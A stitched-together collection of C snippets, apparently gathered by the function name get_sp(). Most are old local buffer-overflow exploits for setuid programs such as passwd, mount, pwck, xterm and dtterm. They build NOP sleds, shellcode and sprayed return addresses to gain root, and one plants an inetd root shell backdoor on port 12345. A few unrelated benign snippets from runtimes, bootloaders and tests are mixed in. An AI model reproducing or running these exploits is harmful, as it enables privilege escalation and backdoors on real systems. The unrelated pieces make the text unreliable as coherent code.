main() { static char x[11000]; memset(x,'a',10000); ret_adr=get_sp()-6300; for (i = 0; i < 5000 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp() - 10200; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("%lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i]; x[10000]=0; execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0); }
int main(int argc, char *argv[]) { int bufsize, offset, i, fd; long *bufptr; char *ptr, *buffer, *tempbuf; setenv("TERMCAP", "/tmp/lstermcap", 1); bufsize=DEFAULT_BUFSIZE; if (argc > 2) bufsize=atoi(argv[2]); if (argc > 1) offset=atoi(argv[1]); else offset=300; printf("bufsize: %i\noffset: %i\n", bufsize,offset); if(!(buffer = malloc(bufsize))) { printf("can't allocate enough memory\n"); exit(0); } if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) { printf("can't allocate enough memory\n"); exit(0); } printf("get_sp(): 0x%x\n", get_sp()); printf("get_sp()-offs: 0x%x\n", (get_sp()-offset) ); ptr=buffer; bufptr = (long *)(buffer+2); /* align */ for (i = 0; i < bufsize; i += 4) *(bufptr++) = (get_sp()-offset); for (i = 0; i < (bufsize/2); i++) buffer[i] = 0x90; ptr=buffer + ((bufsize/2) - strlen(shellcode)/2); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; //shellcode ptr=ptr+24; /* now insert the characters : and \ into the termcap - these are vital */ *(ptr++)=0x3a; *(ptr++)=0x5c; snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer); fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666); write (fd, tempbuf, strlen(tempbuf)); close(fd); printf("made termcap\n"); execl("/usr/X11R6/bin/xterm","xterm", 0); }
/* * Checks whether get_sp() works as expected. It doesn't work with gcc-2.95.3 on linux. */ static gboolean is_get_sp_reliable (void) { void *sp1, *sp2; reliable_delegate(1); sp1 = get_sp(); reliable_delegate(1); sp2 = get_sp(); return sp1 == sp2; }
LIBTEST_API int STDCALL mono_test_marshal_delegate (SimpleDelegate delegate) { void *sp1, *sp2; /* Check that the delegate wrapper is stdcall */ delegate (2); sp1 = get_sp (); delegate (2); sp2 = get_sp (); if (is_get_sp_reliable()) g_assert (sp1 == sp2); return delegate (2); }
main() { char buf[MAXBUF+1]; unsigned int i,ip,sp; sprintf(buf,"%s.c",SHELL); if ((fp=fopen(buf,"w"))==NULL){ printf("Can not write to %s\n",buf); exit(1); } fprintf(fp,"main(){setuid(0);setgid(0);"); fprintf(fp,"system(\"echo 12345 stream tcp nowait root /bin/sh sh -i"); fprintf(fp," >> /etc/inetd.conf; killall -HUP inetd\");}\n"); fclose(fp); sprintf(buf,"%s %s.c -o %s",COMPILER,SHELL,SHELL); system(buf); memset(buf,'a',MAXBUF); buf[MAXBUF]=0; strcat(exec,SHELL); memcpy(buf+300,exec,strlen(exec)); sp=get_sp(); ip=sp+JMP_OFS; printf("Jumping address = %x\n\n\n",ip); printf("Please execute following command after \"Segmentation Fault\"\n"); printf("\ntelnet localhost 12345\n\n\n"); buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; execl("/usr/jp/canna/bin/canuum","canuum","-k",buf,(char *)0); }
main(int argc, char *argv[]){ char buf[136]; int i; int offset=0,*ptr; long ret; if(argc!=2){ printf("usage: %s offset\n",argv[0]); exit(0);} offset=atoi(argv[1]); ret=(get_sp()-offset); for(i=1;i<136;i+=4){ *(long *)&buf[i]=ret;} printf("\nusing: 0x%x\n\n",ret); for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++) buf[i]=NOP; memcpy(buf+i,shellcode,strlen(shellcode)); execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0); }
int main (int argc, char **argv) { int i, slen = strlen(scode), offset = 0; long ptr, *lptr; char *buf; if (argc > 1) offset = strtoul(argv[1], NULL, 0); buf = (char *)malloc(1024); memset(buf, 0, 1024); for (i = 0; i < (901 - slen); i++) buf[i] = 0x90; printf("shellcode length: %d\n", slen); for (i = (901 - slen); i < 901; i++) buf[i] = scode[i - (901 - slen)]; lptr = (long *)(buf + 901); printf("address: 0x%lx\n", ptr = (get_sp() - offset)); for (i = 0; i < 30; i++) *(lptr + i) = (int)ptr; execl(_PATH, "nwprint", buf, NULL); return(0); }
int main() { char cmdBuf[BUFSIZE]; char cmd[BUFSIZE]; int i, j, shellLen; long addr; shellLen = strlen(shellcode); addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); for(i=0; i<sizeof(cmdBuf)-shellLen; i++) cmdBuf[i] = NOP; printf("I : %d\n", i); for(j=0; j<shellLen; j++) cmdBuf[i++] = shellcode[j]; printf("I : %d \n", i); strcpy(cmd, "`"); strcat(cmd, cmdBuf); strcat(cmd, "`"); execl(VICTIM, VICTIM, cmd, 0); }
main() { putenv("LANG="); memset(x,'x',70000); for (i = 0; i < ADJUST; i++) x[i]=0x40; for (i = ADJUST; i < 1000; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i]; ret_adr=get_sp()-OFFSET; printf("jumping address : %lx\n",ret_adr); if ((ret_adr & 0xff) ==0 ){ ret_adr -=16; printf("New jumping address : %lx\n",ret_adr); } for (i = ADJUST+RETS; i < RETS+600; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } memcpy(x,EV,strlen(EV)); x[3000]=0; putenv(x); execl("/bin/passwd","passwd",(char *)0); }
int main(int argc, char *argv[]) { char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1]; long offset, ret; int x, y; if(argc > 2) { fprintf(stderr, "Usage: %s [offset]\n", argv[0]); exit(1); } // end of if.. if(argc == 2) offset = atol(argv[1]); else offset = 0; ret = get_sp() + 900 + offset; for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP; x = BUFFER_SIZE - strlen(shell) - ADJUST; for(y=0; y<strlen(shell); y++) buffer[x++] = shell[y]; for(y=0; y<RET_LENGTH; y++, x += 4) *((int *)&buffer[x]) = ret; buffer[x] = 0x00; printf("ret = 0x%x,\n", ret); printf("offset = %d\n", offset); printf("buffer size = %d\n", strlen(buffer)); execl("/usr/dt/bin/dtterm", "dtterm", "-xrm", buffer, NULL); printf("exec failed\n"); }
int main(int argc, char **argv) { int bsize = 2391; unsigned long addr; char *buff; int i; if (bsize % 4 != 0) { bsize = bsize + 4 - (bsize % 4); } buff = (char *)malloc(bsize); addr = get_sp(); system("clear"); fprintf(stderr, "pwck exploit..... [email protected]\n\n"); fprintf(stderr, "Mandrake 8.2 sisteminde test edilmistir.\n", addr); fprintf(stderr, "Buffer: %d\n", bsize); for(i = 0; i < bsize; i++) { *(long *)&buff[i] = 0x90; } *(long *)&buff[bsize - 4] = addr; memcpy(buff + bsize - strlen(shellcode) - 8, shellcode, strlen(shellcode)); execl("/usr/sbin/pwck", "pwck", buff, NULL); return 0; }
int main (int argc, char *argv[]) { char buffer[BUFSIZE]; int i, offset; unsigned long ret; if (argc > 1) offset = atoi(argv[1]); else offset = OFFSET; for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++) *(buffer + i) = NOP; memcpy (buffer + i, blah, strlen (blah)); ret = get_sp(); for (i = i + strlen (blah); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); fprintf(stderr, "[email protected]\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); execl ("./xsoldier", "xsoldier", "-display", buffer, 0); }
int main(int argc, char *argv[]) { int i, offset=0; long addr; char *buf, *ptr; if(argc > 1) offset = atoi(argv[1]); buf = (char *)malloc(sizeof(char) * LEN); bzero(buf, LEN); addr = get_sp() - offset; printf("addr: 0x%x, offset: %d\n", addr, offset); for(i = 0; i < LEN; i += 4) { *(long *)&buf[i] = addr; } for(i = 0; i < (LEN / 2); i++) { *(buf + i) = NOP; } ptr = buf + ((LEN / 2) - (strlen(shell) / 2)); for(i = 0; i < strlen(shell); i++) { *(ptr++) = shell[i]; } buf[LEN - 1] = '\0'; execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0); return(0); }
void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),so; long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0); perror("execl failed"); }
main(int argc, char *argv[]) { int i,ofs=OFFSET,start=START,end=END; u_long ret, *ulp; char *buf; if (argc > 1) ofs=atoi(argv[1])+8; if (!(buf = (char *) malloc(BSIZE+2))) { fprintf(stderr, "out of memory\n"); exit(1); } ret = get_sp() - ofs; for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++) *ulp = NOP; for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret; for (i = 0; i < strlen(sparc_shellcode); i++) buf[EXSTART+i] = sparc_shellcode[i]; buf[5000]='='; buf[18000]=0; fprintf(stderr, "ret: 0x%lx xlen: %d ofs: 0x%lx (%d)\n", ret, strlen(buf)-2, ofs, ofs); execl("/usr/bin/lpset","lpset","-n","xfn","-a",&buf[2],"lpcol1",0); perror("execl"); }
void arch_lmb_reserve(struct lmb *lmb) { ulong sp; /* * Booting a (Linux) kernel image * * Allocate space for command line and board info - the * address should be as high as possible within the reach of * the kernel (see CONFIG_SYS_BOOTMAPSZ settings), but in unused * memory, which means far enough below the current stack * pointer. */ sp = get_sp(); debug("## Current stack ends at 0x%08lx ", sp); /* adjust sp by 1K to be safe */ sp -= 1024; /* * Skip reservation if our stack is not in external RAM */ if (sp >= gd->bd->bi_dram[0].start && sp < gd->bd->bi_dram[0].start + gd->bd->bi_dram[0].size) { lmb_reserve(lmb, sp, gd->bd->bi_dram[0].start + gd->bd->bi_dram[0].size - sp); } }
void main(int argc, char **argv) { char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char buffer[lv_size + 4 * 8]; unsigned long *ptr2 = NULL; char *ptr = NULL; int i; for (i = 0; i < lv_size + 4 * 8; i++) buffer[i] = 0x00; ptr = buffer; for (i = 0; i < lv_size - strlen(execshell); i++) *(ptr++) = 0x90; for (i = 0; i < strlen(execshell); i++) *(ptr++) = execshell[i]; ptr2 = (long *) ptr; for (i = 1; i < 2; i++) *(ptr2++) = get_sp() + offset; printf("discovered by bloodmask&vio/couin\n" "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n"); (void) alarm((int) 0); execl("/bin/mount", "mount", buffer, NULL); }
main() { strcat(exec,SHELL); sprintf(xx,"%s.c",SHELL); if ((fp=fopen(xx,"w"))==NULL){ printf("Can not write to %s\n",xx); exit(1); } fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}"); fclose(fp); sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL); system(xx); sp=get_sp(); memset(xx,NOP,MAXBUF); ip=sp-JMP_OFS; printf("Jumping address = %x\n",ip); xx[RET_ADR ]=ip&0xff; xx[RET_ADR+1]=(ip>>8)&0xff; xx[RET_ADR+2]=(ip>>16)&0xff; xx[RET_ADR+3]=(ip>>24)&0xff; strncpy(xx+EXP_ADR,exec,strlen(exec)); xx[MAXBUF]=0; execl("/usr/bin/uum","uum","-D",xx,(char *) 0); }
main() { char buf[BUF_SIZE]; unsigned int esp=get_sp(),sw; memset(buf,NOP,BUF_SIZE); memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code, strlen(shell_code)); printf("esp=%x\n",esp); printf("0:Default value 1:Calculated value >"); fflush(stdout); scanf("%d",&sw); if (sw==0){ valset(buf+FAKE_OFFSET, FAKE_VALUE); valset(buf+EIP_OFFSET , EIP_VALUE); printf("Jumping address = %x\n",EIP_VALUE); }else{ valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF); valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF); printf("Jumping address = %x\n",esp+EIP_VALUE_DIF); } buf[BUF_SIZE-1]=0; execl("/usr/dt/bin/dtaction",buf,NULL); }
int main (int argc, char *argv[]) { char buffer[LEN]; int i; long retaddr = get_sp (); /*Fill the buffer with our new address to jump to esp + offset */ for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr + atoi (argv[1]); /*copy the NOPs in to the buffer leaving space for shellcode and pointers*/ printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN); /* for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP;*/ /*copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); }
void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); }
void main(int argc, char *argv[]) { int bsize=0, offset=0,i=0,j=0; char *buff, *ptr; long long *addr,*addr_ptr; if (argc == 1) { printf("\n\nUsage is either attack [buffer_size]\n or attack [buffer_size] [stack_offset]\n"); exit(0); } if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); buff = malloc(bsize); addr = get_sp() -offset; printf("\nUsing address as guess for beginning of attack buffer: 0x%x\n", addr); ptr = buff; addr_ptr = (long long *) ptr; for (i = 0; i < bsize-8; i+=8) *(addr_ptr++) = 0xFFFFFFFFFFFFFFFF; *(addr_ptr)=addr; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = (char*)NULL; execl("./vuln","./vuln", buff, NULL); return; }
/* void main(int argc, char *argv[]) { */ void main() { char *buff, *ptr,binary[120]; long *addr_ptr, addr; int bsize=BUFFER; int i,offset=OFFSET; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() -1420 -offset; ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; memset(buff,bsize/2,NOP); ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("ORACLE_HOME",ORACLE_HOME,1); setenv("EGG",buff,1); system(BINARY); }
void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i<bsize;i+=4) { buff[i+ALIGN]=(addr&0x000000ff); buff[i+ALIGN+1]=(addr&0x0000ff00)>>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0'; printf("Jump to 0x%08x\n",addr); execl("./vulnerable2","vulnerable2",buff,0); }
void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("xosview exploit by Kossak\n"); printf("try changing the default values if you dont get root now.\n"); printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("HOME", buff, 1); system("/usr/bin/X11/xosview -display 0:0"); /* your IP here */ }
int main (int argc, char *argv[]) { DWORD sp1, sp2; WORD c; int i; LIN_ADDR b; struct multiboot_info *mbi; sp1 = get_sp(); mbi = ll_init(); if (mbi == NULL) { message("Error in LowLevel initialization code...\n"); l1_exit(-1); } message("Starting..."); c = ll_context_save(); message("CX=%x\n",c); for (i = 0; i < 0x4F000; i++); dos_mem_init(); b = dos_alloc(BSIZE); vm86_init(b, BSIZE); l1_int_bind(0x40, reflect); l1_int_bind(0x15, reflect); l1_int_bind(0x10, int0x10); l1_irq_bind(6, reflect); l1_irq_bind(15, reflect); l1_irq_bind(14, reflect); irq_unmask(6); irq_unmask(15); irq_unmask(14); disk_demo(); sp2 = get_sp(); message("End reached!\n"); message("Actual stack : %lx - ", sp2); message("Begin stack : %lx\n", sp1); message("Check if same : %s\n",sp1 == sp2 ? "Ok :-)" : "No :-("); ll_end(); return 1; }
/* Called by landing pads during unwinding to figure out which stack segment we are currently running on and record the stack limit (which was not restored when unwinding through __morestack). */ void rust_task::reset_stack_limit() { uintptr_t sp = get_sp(); while (!sp_in_stk_seg(sp, stk)) { prev_stack(); assert(stk != NULL && "Failed to find the current stack"); } }
static void intr_79(struct intr_frame *frame) { (void)frame; intr_79_counter += 1; print_intr_frame("intr 79:", frame); ac_printf(" ss: %x\n", get_ss()); ac_printf(" sp: %p\n", get_sp()); ac_printf(" intr_79_counter=%d\n", intr_79_counter); }
int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } addr = get_sp(); printf("/usr/X11R6/bin/ascdc local exploit.\n"); printf("Coded by The Itch / BsE\n\n"); printf("Using return address: 0x%x\n", addr); printf("Using buffersize : %d\n", bsize); ptr = buff; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) -1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); memcpy(buff, "RET=", 4); putenv(buff); system("/usr/X11R6/bin/ascdc -c $RET"); return 0; }
oop_t ActivationObj::vector_of_outgoing_arguments(fint argc, bool isImplicitSelf) { ObjVectorObj* vaddr; oop_t v = ((ObjVectorObj*) The::addr_of(The::vector_proto))->clone_and_resize(argc, The::oop_of(The::nil_object), &vaddr); fint beginning_of_args_offset = indexableOrigin() + get_sp() + (isImplicitSelf ? 0 : 1); // sp has already been cut back fint end_of_args_offset = beginning_of_args_offset + argc; for (fint i = beginning_of_args_offset; i < end_of_args_offset; ++i) { vaddr->write_indexable_at( i, read_oop(i) ); } return v; }